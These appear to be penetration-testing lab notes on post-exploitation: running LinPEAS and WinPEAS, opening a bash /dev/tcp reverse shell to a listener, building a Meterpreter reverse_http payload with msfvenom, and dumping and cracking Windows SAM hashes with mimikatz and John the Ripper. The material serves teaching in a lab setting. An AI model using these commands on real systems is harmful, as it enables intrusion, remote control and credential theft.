

# Enumeration Scripts

Note:  Enumeration scripts for this lab are located in 
`~/cnm352-tools/scripts`

### Uploading Scripts

Sometimes it can be a little tricky to find spots to upload scripts.  You will need a directory that is writable by your current user so you can write the file.  

In Linux, a likely folder is `/tmp`  because this is world-writable.  

In Windows, there are two folders you can try, using variable strings (you type these in exactly like this and the variable will translate to the correct place):

- On older versions of Windows:  `%systemdrive%\Windows\Temp`
- For newer versions: `%userprofile%\AppData\Local\Temp`

## Linux

### LinPEAS

To run the Linpeas enumeration script, first transfer the linpeas.sh file to the target and set the execute bits.

```bash
chmod +x linpeas.sh
```

Run the script one of two ways to capture output:

```bash
# Don't show output at the CLI, only capture to a file
./linpeas.sh > linpeas.txt

# Show output at CLI AND capture to file
./linpeas.sh | tee linpeas.txt
```

To view the output of the file in Kali with color coding:

```bash
less -r linpeas.txt
# Answer Y when asked if you want to continue opening
```

## Windows

### WinPEAS

Winpeas for Windows comes in multiple varieties.  The best one to use depends on the situation, but running each is straightforward:

```bash
# Batch file (for worst case scenarios)
winPEAS.bat > winpeas.txt

# 32-bit & compatible with 64-bit
winPEASx86.exe > winpeas.txt

# 64-bit only
winPEASx64.exe > winpeas.txt

# Viewing file from Windows CLI
type winpeas.txt
```

### Reverse Shell Without Netcat

You are not always guaranteed to have netcat on a target system.  You could always transfer the netcat binary.  However, it's also possible to initiate a reverse shell connection without netcat on the target.  

You will still need to start a netcat listener on Kali, but issuing this command on the target will cause the target to connect back in a reverse shell:

```bash
# Example 
# Connect to a netcat listener on 10.250.226.250 port 8001
bash &>/dev/tcp/10.250.226.250/8001 <&1
```

NOTE:  If echoing this command into a file, BE SURE to enclose it in single quotes or it will execute commands:

```bash
# Example
echo 'bash &>/dev/tcp/10.250.226.250/8001 <&1' > somefile.sh
```

MSFvenome

msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.14.37 LPORT=8000 -f exe -o win_met_revhttp_8000.exe

### Checking Permissions on Windows

Use whoami to check if a user is an administrator on Windows and also what context the prompt is running in.

#### Admin Group

Check the groups a user is in with whoami and see if they are a member of Administrators:

```bash
whoami /groups
```

#### UAC Context

If UAC is enabled on a system, the prompt can run in an admin or non-admin context, depending on what created the shell.  You can tell this by looking at the `whoami /groups` output and near the end is a line that says `Mandatory Label`.  

- If the prompt is an admin prompt, this will display `Mandatory Label\High Mandatory Level`
- If the prompt is an non-admin prompt, this will display `Mandatory Label\Medium Mandatory Level` 

#### Extended Permissions

You can view the special permissions of an account to see if they have some vulnerable permissions such as `seimpersonate` using this command:

```bash
whoami /priv
```

### Checking Windows Architecture

Enter this command to find the system's 32 or 64 bit architecture:

```bash
wmic os get OSArchitecture
```

### Dumping Windows Hashes with MimiKatz

You can dump hashes in a regular shell by using the mimikatz tool.   The mimikatz executables are found in Kali under `/usr/share/windows-resources/mimikatz`.  Mimikatz has a 32 and 64-bit version, and this should match the target system's architecture.  

This tool requires and admin account in order to run.

After transferring the correct mimikatz binary to the Windows target, run mimikatz to enter the mimikatz prompt.  Then run the following commands to retrieve the hashes:

1. Request debug privileges

   `privilege::debug`

2. Impersonate the SYSTEM user's token to run commands as SYSTEM
   `token::elevate`

3. Dump the password hashes in the SAM file from the LSA process's memory space
   `lsadump::sam`

4. Search the output for usernames and hashes.  It will show up as an NTLM hash, but JTR uses `NT` as the format.

5. Copy the hash values to a file in Kali Linux and then run John the Ripper on them to crack them:
   `john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash.txt`

